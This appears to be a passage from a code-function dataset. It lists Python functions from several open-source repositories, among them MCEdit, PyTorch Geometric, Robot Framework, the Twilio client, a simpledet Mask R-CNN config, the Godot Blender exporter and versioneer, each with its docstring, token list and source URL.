def assign_value(x, y, z, values, save_file): '''Assign an index value to a location in mcmap. If the index is outside the bounds of the map, return None. If the assignment succeeds, return True. ''' if y > 255: return None result = save_file.set_block(x, y, z, values) if LIGHTINGFIX: relight_master.add(x, z) return result
[ "def", "assign_value", "(", "x", ",", "y", ",", "z", ",", "values", ",", "save_file", ")", ":", "if", "y", ">", "255", ":", "return", "None", "result", "=", "save_file", ".", "set_block", "(", "x", ",", "y", ",", "z", ",", "values", ")", "if", "LIGHTINGFIX", ":", "relight_master", ".", "add", "(", "x", ",", "z", ")", "return", "result" ]
https://github.com/Podshot/MCEdit-Unified/blob/90abfb170c65b877ac67193e717fa3a3ded635dd/stock-filters/Forester.py#L461-L472
pyg-team/pytorch_geometric
b920e9a3a64e22c8356be55301c88444ff051cae
examples/infomax_inductive.py
python
Encoder.__init__
(self, in_channels, hidden_channels)
[]
def __init__(self, in_channels, hidden_channels): super().__init__() self.convs = torch.nn.ModuleList([ SAGEConv(in_channels, hidden_channels), SAGEConv(hidden_channels, hidden_channels), SAGEConv(hidden_channels, hidden_channels) ]) self.activations = torch.nn.ModuleList() self.activations.extend([ nn.PReLU(hidden_channels), nn.PReLU(hidden_channels), nn.PReLU(hidden_channels) ])
[ "def", "__init__", "(", "self", ",", "in_channels", ",", "hidden_channels", ")", ":", "super", "(", ")", ".", "__init__", "(", ")", "self", ".", "convs", "=", "torch", ".", "nn", ".", "ModuleList", "(", "[", "SAGEConv", "(", "in_channels", ",", "hidden_channels", ")", ",", "SAGEConv", "(", "hidden_channels", ",", "hidden_channels", ")", ",", "SAGEConv", "(", "hidden_channels", ",", "hidden_channels", ")", "]", ")", "self", ".", "activations", "=", "torch", ".", "nn", ".", "ModuleList", "(", ")", "self", ".", "activations", ".", "extend", "(", "[", "nn", ".", "PReLU", "(", "hidden_channels", ")", ",", "nn", ".", "PReLU", "(", "hidden_channels", ")", ",", "nn", ".", "PReLU", "(", "hidden_channels", ")", "]", ")" ]
https://github.com/pyg-team/pytorch_geometric/blob/b920e9a3a64e22c8356be55301c88444ff051cae/examples/infomax_inductive.py#L26-L39
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_flaskbb/Python-2.7.9/Lib/plat-mac/FrameWork.py
python
MenuItem.check
(self, onoff)
[]
def check(self, onoff): self.menu.menu.CheckMenuItem(self.item, onoff)
[ "def", "check", "(", "self", ",", "onoff", ")", ":", "self", ".", "menu", ".", "menu", ".", "CheckMenuItem", "(", "self", ".", "item", ",", "onoff", ")" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/Python-2.7.9/Lib/plat-mac/FrameWork.py#L674-L675
robotframework/robotframework
e4f66e7bbe02b1741224ad4ab3fbfe9e1cb51ecf
src/robot/utils/misc.py
python
seq2str2
(sequence)
return '[ %s ]' % ' | '.join(safe_str(item) for item in sequence)
Returns sequence in format `[ item 1 | item 2 | ... ]`.
Returns sequence in format `[ item 1 | item 2 | ... ]`.
[ "Returns", "sequence", "in", "format", "[", "item", "1", "|", "item", "2", "|", "...", "]", "." ]
def seq2str2(sequence): """Returns sequence in format `[ item 1 | item 2 | ... ]`.""" if not sequence: return '[ ]' return '[ %s ]' % ' | '.join(safe_str(item) for item in sequence)
[ "def", "seq2str2", "(", "sequence", ")", ":", "if", "not", "sequence", ":", "return", "'[ ]'", "return", "'[ %s ]'", "%", "' | '", ".", "join", "(", "safe_str", "(", "item", ")", "for", "item", "in", "sequence", ")" ]
https://github.com/robotframework/robotframework/blob/e4f66e7bbe02b1741224ad4ab3fbfe9e1cb51ecf/src/robot/utils/misc.py#L117-L121
twilio/twilio-python
6e1e811ea57a1edfadd5161ace87397c563f6915
twilio/rest/serverless/v1/service/asset/asset_version.py
python
AssetVersionInstance.__init__
(self, version, payload, service_sid, asset_sid, sid=None)
Initialize the AssetVersionInstance :returns: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance :rtype: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance
Initialize the AssetVersionInstance
[ "Initialize", "the", "AssetVersionInstance" ]
def __init__(self, version, payload, service_sid, asset_sid, sid=None): """ Initialize the AssetVersionInstance :returns: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance :rtype: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance """ super(AssetVersionInstance, self).__init__(version) # Marshaled Properties self._properties = { 'sid': payload.get('sid'), 'account_sid': payload.get('account_sid'), 'service_sid': payload.get('service_sid'), 'asset_sid': payload.get('asset_sid'), 'path': payload.get('path'), 'visibility': payload.get('visibility'), 'date_created': deserialize.iso8601_datetime(payload.get('date_created')), 'url': payload.get('url'), } # Context self._context = None self._solution = { 'service_sid': service_sid, 'asset_sid': asset_sid, 'sid': sid or self._properties['sid'], }
[ "def", "__init__", "(", "self", ",", "version", ",", "payload", ",", "service_sid", ",", "asset_sid", ",", "sid", "=", "None", ")", ":", "super", "(", "AssetVersionInstance", ",", "self", ")", ".", "__init__", "(", "version", ")", "# Marshaled Properties", "self", ".", "_properties", "=", "{", "'sid'", ":", "payload", ".", "get", "(", "'sid'", ")", ",", "'account_sid'", ":", "payload", ".", "get", "(", "'account_sid'", ")", ",", "'service_sid'", ":", "payload", ".", "get", "(", "'service_sid'", ")", ",", "'asset_sid'", ":", "payload", ".", "get", "(", "'asset_sid'", ")", ",", "'path'", ":", "payload", ".", "get", "(", "'path'", ")", ",", "'visibility'", ":", "payload", ".", "get", "(", "'visibility'", ")", ",", "'date_created'", ":", "deserialize", ".", "iso8601_datetime", "(", "payload", ".", "get", "(", "'date_created'", ")", ")", ",", "'url'", ":", "payload", ".", "get", "(", "'url'", ")", ",", "}", "# Context", "self", ".", "_context", "=", "None", "self", ".", "_solution", "=", "{", "'service_sid'", ":", "service_sid", ",", "'asset_sid'", ":", "asset_sid", ",", "'sid'", ":", "sid", "or", "self", ".", "_properties", "[", "'sid'", "]", ",", "}" ]
https://github.com/twilio/twilio-python/blob/6e1e811ea57a1edfadd5161ace87397c563f6915/twilio/rest/serverless/v1/service/asset/asset_version.py#L263-L290
chengzhengxin/groupsoftmax-simpledet
3f63a00998c57fee25241cf43a2e8600893ea462
config/resnet_v1b/mask_r50v1b_fpn_2x.py
python
get_config
(is_train)
return General, KvstoreParam, RpnParam, RoiParam, BboxParam, DatasetParam, \ ModelParam, OptimizeParam, TestParam, \ transform, data_name, label_name, metric_list
[]
def get_config(is_train): class General: log_frequency = 10 name = __name__.rsplit("/")[-1].rsplit(".")[-1] batch_image = 2 if is_train else 1 fp16 = False loader_worker = 8 class KvstoreParam: kvstore = "nccl" batch_image = General.batch_image gpus = [0, 1, 2, 3, 4, 5, 6, 7] fp16 = General.fp16 class NormalizeParam: normalizer = normalizer_factory(type="fixbn") class BackboneParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer depth = 50 class NeckParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer class RpnParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer batch_image = General.batch_image nnvm_proposal = True nnvm_rpn_target = False class anchor_generate: scale = (8,) ratio = (0.5, 1.0, 2.0) stride = (4, 8, 16, 32, 64) image_anchor = 256 max_side = 1400 class anchor_assign: allowed_border = 0 pos_thr = 0.7 neg_thr = 0.3 min_pos_thr = 0.0 image_anchor = 256 pos_fraction = 0.5 class head: conv_channel = 256 mean = (0, 0, 0, 0) std = (1, 1, 1, 1) class proposal: pre_nms_top_n = 2000 if is_train else 1000 post_nms_top_n = 2000 if is_train else 1000 nms_thr = 0.7 min_bbox_side = 0 class subsample_proposal: proposal_wo_gt = False image_roi = 512 fg_fraction = 0.25 fg_thr = 0.5 bg_thr_hi = 0.5 bg_thr_lo = 0.0 class bbox_target: num_reg_class = 81 class_agnostic = False weight = (1.0, 1.0, 1.0, 1.0) mean = (0.0, 0.0, 0.0, 0.0) std = (0.1, 0.1, 0.2, 0.2) class BboxParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer num_class = 1 + 80 image_roi = 512 batch_image = General.batch_image class regress_target: class_agnostic = False mean = (0.0, 0.0, 0.0, 0.0) std = (0.1, 0.1, 0.2, 0.2) class MaskParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer resolution = 28 dim_reduced = 256 num_fg_roi = int(RpnParam.subsample_proposal.image_roi * RpnParam.subsample_proposal.fg_fraction) class RoiParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer out_size = 7 stride = (4, 8, 16, 32) roi_canonical_scale = 224 roi_canonical_level = 4 class MaskRoiParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer out_size = 14 stride = (4, 8, 16, 32) roi_canonical_scale = 224 roi_canonical_level = 4 class DatasetParam: if is_train: image_set = ("coco_train2014", "coco_valminusminival2014") else: image_set = ("coco_minival2014", ) class OptimizeParam: class optimizer: type = "sgd" lr = 0.01 / 8 * len(KvstoreParam.gpus) * KvstoreParam.batch_image momentum = 0.9 wd = 0.0001 clip_gradient = None class schedule: mult = 2 begin_epoch = 0 end_epoch = 6 * mult lr_iter = [60000 * mult * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image), 80000 * mult * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image)] class warmup: type = "gradual" lr = 0.01 / 8 * len(KvstoreParam.gpus) * KvstoreParam.batch_image / 3.0 iter = 500 class TestParam: min_det_score = 0.05 max_det_per_image = 100 process_roidb = lambda x: x process_output = lambda x, y: process_output(x, y) class model: prefix = "experiments/{}/checkpoint".format(General.name) epoch = OptimizeParam.schedule.end_epoch class nms: type = "nms" thr = 0.5 class coco: annotation = "data/coco/annotations/instances_minival2014.json" backbone = Backbone(BackboneParam) neck = Neck(NeckParam) rpn_head = RpnHead(RpnParam, MaskParam) roi_extractor = RoiExtractor(RoiParam) mask_roi_extractor = RoiExtractor(MaskRoiParam) bbox_head = BboxHead(BboxParam) mask_head = MaskHead(BboxParam, MaskParam, MaskRoiParam) bbox_post_processer = BboxPostProcessor(TestParam) detector = Detector() if is_train: train_sym = detector.get_train_symbol(backbone, neck, rpn_head, roi_extractor, mask_roi_extractor, bbox_head, mask_head) test_sym = None else: train_sym = None test_sym = detector.get_test_symbol(backbone, neck, rpn_head, roi_extractor, mask_roi_extractor, bbox_head, mask_head, bbox_post_processer) class ModelParam: train_symbol = train_sym test_symbol = test_sym from_scratch = False random = True memonger = False memonger_until = "stage3_unit21_plus" class pretrain: prefix = "pretrain_model/resnet%s_v1b" % BackboneParam.depth epoch = 0 fixed_param = ["conv0", "stage1", "gamma", "beta"] excluded_param = ["mask_fcn"] def process_weight(sym, arg, aux): for stride in RpnParam.anchor_generate.stride: add_anchor_to_arg( sym, arg, aux, RpnParam.anchor_generate.max_side, stride, RpnParam.anchor_generate.scale, RpnParam.anchor_generate.ratio) # data processing class NormParam: mean = tuple(i * 255 for i in (0.485, 0.456, 0.406)) # RGB order std = tuple(i * 255 for i in (0.229, 0.224, 0.225)) # data processing class ResizeParam: short = 800 long = 1333 class PadParam: short = 800 long = 1333 max_num_gt = 100 max_len_gt_poly = 2500 class AnchorTarget2DParam: def __init__(self): self.generate = self._generate() class _generate: def __init__(self): self.stride = (4, 8, 16, 32, 64) self.short = (200, 100, 50, 25, 13) self.long = (334, 167, 84, 42, 21) scales = (8) aspects = (0.5, 1.0, 2.0) class assign: allowed_border = 0 pos_thr = 0.7 neg_thr = 0.3 min_pos_thr = 0.0 class sample: image_anchor = 256 pos_fraction = 0.5 class RenameParam: mapping = dict(image="data") from core.detection_input import ReadRoiRecord, Resize2DImageBbox, \ ConvertImageFromHwcToChw, Flip2DImageBbox, Pad2DImageBbox, \ RenameRecord, Norm2DImage from models.maskrcnn.input import PreprocessGtPoly, EncodeGtPoly, \ Resize2DImageBboxMask, Flip2DImageBboxMask, Pad2DImageBboxMask from models.FPN.input import PyramidAnchorTarget2D if is_train: transform = [ ReadRoiRecord(None), Norm2DImage(NormParam), PreprocessGtPoly(), Resize2DImageBboxMask(ResizeParam), Flip2DImageBboxMask(), EncodeGtPoly(PadParam), Pad2DImageBboxMask(PadParam), ConvertImageFromHwcToChw(), RenameRecord(RenameParam.mapping) ] data_name = ["data"] label_name = ["im_info", "gt_bbox", "gt_poly"] if not RpnParam.nnvm_rpn_target: transform.append(PyramidAnchorTarget2D(AnchorTarget2DParam())) label_name += ["rpn_cls_label", "rpn_reg_target", "rpn_reg_weight"] else: transform = [ ReadRoiRecord(None), Norm2DImage(NormParam), Resize2DImageBbox(ResizeParam), ConvertImageFromHwcToChw(), RenameRecord(RenameParam.mapping) ] data_name = ["data", "im_info", "im_id", "rec_id"] label_name = [] import core.detection_metric as metric from models.maskrcnn.metric import SigmoidCELossMetric rpn_acc_metric = metric.AccWithIgnore( "RpnAcc", ["rpn_cls_loss_output", "rpn_cls_label_blockgrad_output"], [] ) rpn_l1_metric = metric.L1( "RpnL1", ["rpn_reg_loss_output", "rpn_cls_label_blockgrad_output"], [] ) # for bbox, the label is generated in network so it is an output box_acc_metric = metric.AccWithIgnore( "RcnnAcc", ["bbox_cls_loss_output", "bbox_label_blockgrad_output"], [] ) box_l1_metric = metric.L1( "RcnnL1", ["bbox_reg_loss_output", "bbox_label_blockgrad_output"], [] ) mask_cls_metric = SigmoidCELossMetric( "MaskCE", ["mask_loss_output"], [] ) metric_list = [rpn_acc_metric, rpn_l1_metric, box_acc_metric, box_l1_metric,] return General, KvstoreParam, RpnParam, RoiParam, BboxParam, DatasetParam, \ ModelParam, OptimizeParam, TestParam, \ transform, data_name, label_name, metric_list
[ "def", "get_config", "(", "is_train", ")", ":", "class", "General", ":", "log_frequency", "=", "10", "name", "=", "__name__", ".", "rsplit", "(", "\"/\"", ")", "[", "-", "1", "]", ".", "rsplit", "(", "\".\"", ")", "[", "-", "1", "]", "batch_image", "=", "2", "if", "is_train", "else", "1", "fp16", "=", "False", "loader_worker", "=", "8", "class", "KvstoreParam", ":", "kvstore", "=", "\"nccl\"", "batch_image", "=", "General", ".", "batch_image", "gpus", "=", "[", "0", ",", "1", ",", "2", ",", "3", ",", "4", ",", "5", ",", "6", ",", "7", "]", "fp16", "=", "General", ".", "fp16", "class", "NormalizeParam", ":", "normalizer", "=", "normalizer_factory", "(", "type", "=", "\"fixbn\"", ")", "class", "BackboneParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "depth", "=", "50", "class", "NeckParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "class", "RpnParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "batch_image", "=", "General", ".", "batch_image", "nnvm_proposal", "=", "True", "nnvm_rpn_target", "=", "False", "class", "anchor_generate", ":", "scale", "=", "(", "8", ",", ")", "ratio", "=", "(", "0.5", ",", "1.0", ",", "2.0", ")", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ",", "64", ")", "image_anchor", "=", "256", "max_side", "=", "1400", "class", "anchor_assign", ":", "allowed_border", "=", "0", "pos_thr", "=", "0.7", "neg_thr", "=", "0.3", "min_pos_thr", "=", "0.0", "image_anchor", "=", "256", "pos_fraction", "=", "0.5", "class", "head", ":", "conv_channel", "=", "256", "mean", "=", "(", "0", ",", "0", ",", "0", ",", "0", ")", "std", "=", "(", "1", ",", "1", ",", "1", ",", "1", ")", "class", "proposal", ":", "pre_nms_top_n", "=", "2000", "if", "is_train", "else", "1000", "post_nms_top_n", "=", "2000", "if", "is_train", "else", "1000", "nms_thr", "=", "0.7", "min_bbox_side", "=", "0", "class", "subsample_proposal", ":", "proposal_wo_gt", "=", "False", "image_roi", "=", "512", "fg_fraction", "=", "0.25", "fg_thr", "=", "0.5", "bg_thr_hi", "=", "0.5", "bg_thr_lo", "=", "0.0", "class", "bbox_target", ":", "num_reg_class", "=", "81", "class_agnostic", "=", "False", "weight", "=", "(", "1.0", ",", "1.0", ",", "1.0", ",", "1.0", ")", "mean", "=", "(", "0.0", ",", "0.0", ",", "0.0", ",", "0.0", ")", "std", "=", "(", "0.1", ",", "0.1", ",", "0.2", ",", "0.2", ")", "class", "BboxParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "num_class", "=", "1", "+", "80", "image_roi", "=", "512", "batch_image", "=", "General", ".", "batch_image", "class", "regress_target", ":", "class_agnostic", "=", "False", "mean", "=", "(", "0.0", ",", "0.0", ",", "0.0", ",", "0.0", ")", "std", "=", "(", "0.1", ",", "0.1", ",", "0.2", ",", "0.2", ")", "class", "MaskParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "resolution", "=", "28", "dim_reduced", "=", "256", "num_fg_roi", "=", "int", "(", "RpnParam", ".", "subsample_proposal", ".", "image_roi", "*", "RpnParam", ".", "subsample_proposal", ".", "fg_fraction", ")", "class", "RoiParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "out_size", "=", "7", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ")", "roi_canonical_scale", "=", "224", "roi_canonical_level", "=", "4", "class", "MaskRoiParam", ":", "fp16", "=", "General", ".", "fp16", "normalizer", "=", "NormalizeParam", ".", "normalizer", "out_size", "=", "14", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ")", "roi_canonical_scale", "=", "224", "roi_canonical_level", "=", "4", "class", "DatasetParam", ":", "if", "is_train", ":", "image_set", "=", "(", "\"coco_train2014\"", ",", "\"coco_valminusminival2014\"", ")", "else", ":", "image_set", "=", "(", "\"coco_minival2014\"", ",", ")", "class", "OptimizeParam", ":", "class", "optimizer", ":", "type", "=", "\"sgd\"", "lr", "=", "0.01", "/", "8", "*", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", "momentum", "=", "0.9", "wd", "=", "0.0001", "clip_gradient", "=", "None", "class", "schedule", ":", "mult", "=", "2", "begin_epoch", "=", "0", "end_epoch", "=", "6", "*", "mult", "lr_iter", "=", "[", "60000", "*", "mult", "*", "16", "//", "(", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", ")", ",", "80000", "*", "mult", "*", "16", "//", "(", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", ")", "]", "class", "warmup", ":", "type", "=", "\"gradual\"", "lr", "=", "0.01", "/", "8", "*", "len", "(", "KvstoreParam", ".", "gpus", ")", "*", "KvstoreParam", ".", "batch_image", "/", "3.0", "iter", "=", "500", "class", "TestParam", ":", "min_det_score", "=", "0.05", "max_det_per_image", "=", "100", "process_roidb", "=", "lambda", "x", ":", "x", "process_output", "=", "lambda", "x", ",", "y", ":", "process_output", "(", "x", ",", "y", ")", "class", "model", ":", "prefix", "=", "\"experiments/{}/checkpoint\"", ".", "format", "(", "General", ".", "name", ")", "epoch", "=", "OptimizeParam", ".", "schedule", ".", "end_epoch", "class", "nms", ":", "type", "=", "\"nms\"", "thr", "=", "0.5", "class", "coco", ":", "annotation", "=", "\"data/coco/annotations/instances_minival2014.json\"", "backbone", "=", "Backbone", "(", "BackboneParam", ")", "neck", "=", "Neck", "(", "NeckParam", ")", "rpn_head", "=", "RpnHead", "(", "RpnParam", ",", "MaskParam", ")", "roi_extractor", "=", "RoiExtractor", "(", "RoiParam", ")", "mask_roi_extractor", "=", "RoiExtractor", "(", "MaskRoiParam", ")", "bbox_head", "=", "BboxHead", "(", "BboxParam", ")", "mask_head", "=", "MaskHead", "(", "BboxParam", ",", "MaskParam", ",", "MaskRoiParam", ")", "bbox_post_processer", "=", "BboxPostProcessor", "(", "TestParam", ")", "detector", "=", "Detector", "(", ")", "if", "is_train", ":", "train_sym", "=", "detector", ".", "get_train_symbol", "(", "backbone", ",", "neck", ",", "rpn_head", ",", "roi_extractor", ",", "mask_roi_extractor", ",", "bbox_head", ",", "mask_head", ")", "test_sym", "=", "None", "else", ":", "train_sym", "=", "None", "test_sym", "=", "detector", ".", "get_test_symbol", "(", "backbone", ",", "neck", ",", "rpn_head", ",", "roi_extractor", ",", "mask_roi_extractor", ",", "bbox_head", ",", "mask_head", ",", "bbox_post_processer", ")", "class", "ModelParam", ":", "train_symbol", "=", "train_sym", "test_symbol", "=", "test_sym", "from_scratch", "=", "False", "random", "=", "True", "memonger", "=", "False", "memonger_until", "=", "\"stage3_unit21_plus\"", "class", "pretrain", ":", "prefix", "=", "\"pretrain_model/resnet%s_v1b\"", "%", "BackboneParam", ".", "depth", "epoch", "=", "0", "fixed_param", "=", "[", "\"conv0\"", ",", "\"stage1\"", ",", "\"gamma\"", ",", "\"beta\"", "]", "excluded_param", "=", "[", "\"mask_fcn\"", "]", "def", "process_weight", "(", "sym", ",", "arg", ",", "aux", ")", ":", "for", "stride", "in", "RpnParam", ".", "anchor_generate", ".", "stride", ":", "add_anchor_to_arg", "(", "sym", ",", "arg", ",", "aux", ",", "RpnParam", ".", "anchor_generate", ".", "max_side", ",", "stride", ",", "RpnParam", ".", "anchor_generate", ".", "scale", ",", "RpnParam", ".", "anchor_generate", ".", "ratio", ")", "# data processing", "class", "NormParam", ":", "mean", "=", "tuple", "(", "i", "*", "255", "for", "i", "in", "(", "0.485", ",", "0.456", ",", "0.406", ")", ")", "# RGB order", "std", "=", "tuple", "(", "i", "*", "255", "for", "i", "in", "(", "0.229", ",", "0.224", ",", "0.225", ")", ")", "# data processing", "class", "ResizeParam", ":", "short", "=", "800", "long", "=", "1333", "class", "PadParam", ":", "short", "=", "800", "long", "=", "1333", "max_num_gt", "=", "100", "max_len_gt_poly", "=", "2500", "class", "AnchorTarget2DParam", ":", "def", "__init__", "(", "self", ")", ":", "self", ".", "generate", "=", "self", ".", "_generate", "(", ")", "class", "_generate", ":", "def", "__init__", "(", "self", ")", ":", "self", ".", "stride", "=", "(", "4", ",", "8", ",", "16", ",", "32", ",", "64", ")", "self", ".", "short", "=", "(", "200", ",", "100", ",", "50", ",", "25", ",", "13", ")", "self", ".", "long", "=", "(", "334", ",", "167", ",", "84", ",", "42", ",", "21", ")", "scales", "=", "(", "8", ")", "aspects", "=", "(", "0.5", ",", "1.0", ",", "2.0", ")", "class", "assign", ":", "allowed_border", "=", "0", "pos_thr", "=", "0.7", "neg_thr", "=", "0.3", "min_pos_thr", "=", "0.0", "class", "sample", ":", "image_anchor", "=", "256", "pos_fraction", "=", "0.5", "class", "RenameParam", ":", "mapping", "=", "dict", "(", "image", "=", "\"data\"", ")", "from", "core", ".", "detection_input", "import", "ReadRoiRecord", ",", "Resize2DImageBbox", ",", "ConvertImageFromHwcToChw", ",", "Flip2DImageBbox", ",", "Pad2DImageBbox", ",", "RenameRecord", ",", "Norm2DImage", "from", "models", ".", "maskrcnn", ".", "input", "import", "PreprocessGtPoly", ",", "EncodeGtPoly", ",", "Resize2DImageBboxMask", ",", "Flip2DImageBboxMask", ",", "Pad2DImageBboxMask", "from", "models", ".", "FPN", ".", "input", "import", "PyramidAnchorTarget2D", "if", "is_train", ":", "transform", "=", "[", "ReadRoiRecord", "(", "None", ")", ",", "Norm2DImage", "(", "NormParam", ")", ",", "PreprocessGtPoly", "(", ")", ",", "Resize2DImageBboxMask", "(", "ResizeParam", ")", ",", "Flip2DImageBboxMask", "(", ")", ",", "EncodeGtPoly", "(", "PadParam", ")", ",", "Pad2DImageBboxMask", "(", "PadParam", ")", ",", "ConvertImageFromHwcToChw", "(", ")", ",", "RenameRecord", "(", "RenameParam", ".", "mapping", ")", "]", "data_name", "=", "[", "\"data\"", "]", "label_name", "=", "[", "\"im_info\"", ",", "\"gt_bbox\"", ",", "\"gt_poly\"", "]", "if", "not", "RpnParam", ".", "nnvm_rpn_target", ":", "transform", ".", "append", "(", "PyramidAnchorTarget2D", "(", "AnchorTarget2DParam", "(", ")", ")", ")", "label_name", "+=", "[", "\"rpn_cls_label\"", ",", "\"rpn_reg_target\"", ",", "\"rpn_reg_weight\"", "]", "else", ":", "transform", "=", "[", "ReadRoiRecord", "(", "None", ")", ",", "Norm2DImage", "(", "NormParam", ")", ",", "Resize2DImageBbox", "(", "ResizeParam", ")", ",", "ConvertImageFromHwcToChw", "(", ")", ",", "RenameRecord", "(", "RenameParam", ".", "mapping", ")", "]", "data_name", "=", "[", "\"data\"", ",", "\"im_info\"", ",", "\"im_id\"", ",", "\"rec_id\"", "]", "label_name", "=", "[", "]", "import", "core", ".", "detection_metric", "as", "metric", "from", "models", ".", "maskrcnn", ".", "metric", "import", "SigmoidCELossMetric", "rpn_acc_metric", "=", "metric", ".", "AccWithIgnore", "(", "\"RpnAcc\"", ",", "[", "\"rpn_cls_loss_output\"", ",", "\"rpn_cls_label_blockgrad_output\"", "]", ",", "[", "]", ")", "rpn_l1_metric", "=", "metric", ".", "L1", "(", "\"RpnL1\"", ",", "[", "\"rpn_reg_loss_output\"", ",", "\"rpn_cls_label_blockgrad_output\"", "]", ",", "[", "]", ")", "# for bbox, the label is generated in network so it is an output", "box_acc_metric", "=", "metric", ".", "AccWithIgnore", "(", "\"RcnnAcc\"", ",", "[", "\"bbox_cls_loss_output\"", ",", "\"bbox_label_blockgrad_output\"", "]", ",", "[", "]", ")", "box_l1_metric", "=", "metric", ".", "L1", "(", "\"RcnnL1\"", ",", "[", "\"bbox_reg_loss_output\"", ",", "\"bbox_label_blockgrad_output\"", "]", ",", "[", "]", ")", "mask_cls_metric", "=", "SigmoidCELossMetric", "(", "\"MaskCE\"", ",", "[", "\"mask_loss_output\"", "]", ",", "[", "]", ")", "metric_list", "=", "[", "rpn_acc_metric", ",", "rpn_l1_metric", ",", "box_acc_metric", ",", "box_l1_metric", ",", "]", "return", "General", ",", "KvstoreParam", ",", "RpnParam", ",", "RoiParam", ",", "BboxParam", ",", "DatasetParam", ",", "ModelParam", ",", "OptimizeParam", ",", "TestParam", ",", "transform", ",", "data_name", ",", "label_name", ",", "metric_list" ]
https://github.com/chengzhengxin/groupsoftmax-simpledet/blob/3f63a00998c57fee25241cf43a2e8600893ea462/config/resnet_v1b/mask_r50v1b_fpn_2x.py#L15-L336
godotengine/godot-blender-exporter
b8b883df64f601acc4c40110e99631422a4978ff
io_scene_godot/converters/simple_nodes.py
python
CameraNode.attribute_conversion
(self)
return self._cam_attr_conv
Get a list of quaternary tuple (blender_attr, godot_attr, lambda converter, attr type)
Get a list of quaternary tuple (blender_attr, godot_attr, lambda converter, attr type)
[ "Get", "a", "list", "of", "quaternary", "tuple", "(", "blender_attr", "godot_attr", "lambda", "converter", "attr", "type", ")" ]
def attribute_conversion(self): """Get a list of quaternary tuple (blender_attr, godot_attr, lambda converter, attr type)""" return self._cam_attr_conv
[ "def", "attribute_conversion", "(", "self", ")", ":", "return", "self", ".", "_cam_attr_conv" ]
https://github.com/godotengine/godot-blender-exporter/blob/b8b883df64f601acc4c40110e99631422a4978ff/io_scene_godot/converters/simple_nodes.py#L45-L48
martinfleis/momepy
ea90c32dd8f6f9ae7d71d2cd5a02e79572c3e8f7
versioneer.py
python
get_cmdclass
()
return cmds
Get the custom setuptools/distutils subclasses used by Versioneer.
Get the custom setuptools/distutils subclasses used by Versioneer.
[ "Get", "the", "custom", "setuptools", "/", "distutils", "subclasses", "used", "by", "Versioneer", "." ]
def get_cmdclass(): """Get the custom setuptools/distutils subclasses used by Versioneer.""" if "versioneer" in sys.modules: del sys.modules["versioneer"] # this fixes the "python setup.py develop" case (also 'install' and # 'easy_install .'), in which subdependencies of the main project are # built (using setup.py bdist_egg) in the same python process. Assume # a main project A and a dependency B, which use different versions # of Versioneer. A's setup.py imports A's Versioneer, leaving it in # sys.modules by the time B's setup.py is executed, causing B to run # with the wrong versioneer. Setuptools wraps the sub-dep builds in a # sandbox that restores sys.modules to it's pre-build state, so the # parent is protected against the child's "import versioneer". By # removing ourselves from sys.modules here, before the child build # happens, we protect the child from the parent's versioneer too. # Also see https://github.com/warner/python-versioneer/issues/52 cmds = {} # we add "version" to both distutils and setuptools from distutils.core import Command class cmd_version(Command): description = "report generated version string" user_options = [] boolean_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): vers = get_versions(verbose=True) print("Version: %s" % vers["version"]) print(" full-revisionid: %s" % vers.get("full-revisionid")) print(" dirty: %s" % vers.get("dirty")) print(" date: %s" % vers.get("date")) if vers["error"]: print(" error: %s" % vers["error"]) cmds["version"] = cmd_version # we override "build_py" in both distutils and setuptools # # most invocation pathways end up running build_py: # distutils/build -> build_py # distutils/install -> distutils/build ->.. # setuptools/bdist_wheel -> distutils/install ->.. # setuptools/bdist_egg -> distutils/install_lib -> build_py # setuptools/install -> bdist_egg ->.. # setuptools/develop -> ? # pip install: # copies source tree to a tempdir before running egg_info/etc # if .git isn't copied too, 'git describe' will fail # then does setup.py bdist_wheel, or sometimes setup.py install # setup.py egg_info -> ? # we override different "build_py" commands for both environments if "setuptools" in sys.modules: from setuptools.command.build_py import build_py as _build_py else: from distutils.command.build_py import build_py as _build_py class cmd_build_py(_build_py): def run(self): root = get_root() cfg = get_config_from_root(root) versions = get_versions() _build_py.run(self) # now locate _version.py in the new build/ directory and replace # it with an updated value if cfg.versionfile_build: target_versionfile = os.path.join(self.build_lib, cfg.versionfile_build) print("UPDATING %s" % target_versionfile) write_to_version_file(target_versionfile, versions) cmds["build_py"] = cmd_build_py if "cx_Freeze" in sys.modules: # cx_freeze enabled? from cx_Freeze.dist import build_exe as _build_exe # nczeczulin reports that py2exe won't like the pep440-style string # as FILEVERSION, but it can be used for PRODUCTVERSION, e.g. # setup(console=[{ # "version": versioneer.get_version().split("+", 1)[0], # FILEVERSION # "product_version": versioneer.get_version(), # ... class 